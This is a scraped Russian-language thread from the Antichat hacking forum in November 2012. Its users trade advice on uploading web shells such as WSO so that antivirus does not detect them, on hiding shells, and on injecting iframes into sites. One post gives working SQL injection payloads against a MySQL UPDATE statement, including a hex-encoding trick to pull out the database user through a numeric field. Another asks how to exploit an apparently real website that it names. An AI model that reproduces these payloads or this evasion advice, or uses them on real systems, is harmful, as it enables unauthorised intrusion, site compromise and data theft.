11.11.2012, 21:44
|
|
Познающий
Регистрация: 25.10.2012
Сообщений: 61
С нами:
7130486
Репутация:
0
|
|
Сообщение от Sat-hacker
Подскажите какой shell лучше заливать,чтоб его не палил антивирус и разные скрипты?
самописный
|
|
|
11.11.2012, 23:04
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
Сообщение от Prosta4ok
самописный
А из таких что есть в паблике?Потому что писать только по русски могу.
|
|
|
|
11.11.2012, 23:10
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Seo_pharmacy
/thread104591.html в самом низу смотри...
Мне кто то может помочь ? Есть ли возможность , с помощью активки , внедрить ифрейм ?
а в чём проблема? вставляещь код фрейма и всё
Сообщение от seozone
может кто подробнее разложить, как спрятать шелл с помощью .htaccess ?
никак
Сообщение от Sat-hacker
А из таких что есть в паблике?Потому что писать только по русски могу.
юзай всо и не парся поетому вопросу вобще
|
|
|
|
12.11.2012, 00:07
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
qaz ним и пользуюсь но где то читал что он много следов в логах оставляет,и антивирусами палиться.
|
|
|
|
12.11.2012, 12:55
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Логи сильно нагружают шеллы, передающие команды посредством Get-запросов, последняя версия WSO таковой не является.
|
|
|
|
12.11.2012, 21:21
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
С нами:
8440113
Репутация:
3
|
|
Всем привет!
В UPDATE(MySQL) есть sqlinj. Как наиболее эффективно ей воспользоваться.
Есть кое какие ограничения:
-вывода ошибки нет, только алерт, что ошипке
-в поле зависать можно только число(если сделать подстановку)
Что пробовал:
Код:
'+(select(user()))+'
результат - пусто
Код:
a'+(select(user()))+'b
результат - пусто
результат 6
результат 3
результат 3
Код:
1'+(select(version()))+'2
результат - 8.1
Конечно можно blind'ануть, но придумал такой вариант:
Код:
'+(select(Replace(Replace(Replace(Replace(Replace(Replace(hex(user()),'F','006'),'E','005'),'D','004'),'C','003'),'B','002'),'A','001')))+'
Если текст небольшой,
результат - 00419100400021004182
иначе - 4.19100400021004e+17
По сравнению с blind'ом, вариант лучше, но и здесь есть минусы, т.к. при обратной конвертации 4.19100400021004e+17 дает 00 419100400021004000
Еще была мысль закомментить оставшуюся часть запроса и update'нуть другое поле, но опасаюсь засветиться, т.к. хз что в where. Хотя по косвенным признакам можно id вытянуть, но боюсь он не цифровой.
Есть еще предложения, что можно сделать? |
|
|
|
12.11.2012, 21:33
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
Сообщение от BigBear
Логи сильно нагружают шеллы, передающие команды посредством Get-запросов, последняя версия WSO таковой не является.
Подскажи пожалуйста где скачать последнюю версию?Не могу найти.
|
|
|
|
12.11.2012, 21:46
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Sat-hacker
Подскажи пожалуйста где скачать последнюю версию?Не могу найти.
пожалуйста, сир. долго искали что не нашли? гугл сдох?
запрос "site:forum.antichat.ru wso" больше не работает?
/thread103155.html
|
|
|
|
13.11.2012, 00:02
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
Konqi да видел я эту версию но незнал что она последяя.
|
|
|
|
13.11.2012, 02:20
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
С нами:
8994048
Репутация:
0
|
|
Товарищи, есть идеи по поводу http://ironage-radio.com/' , можно как-то это использовать?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
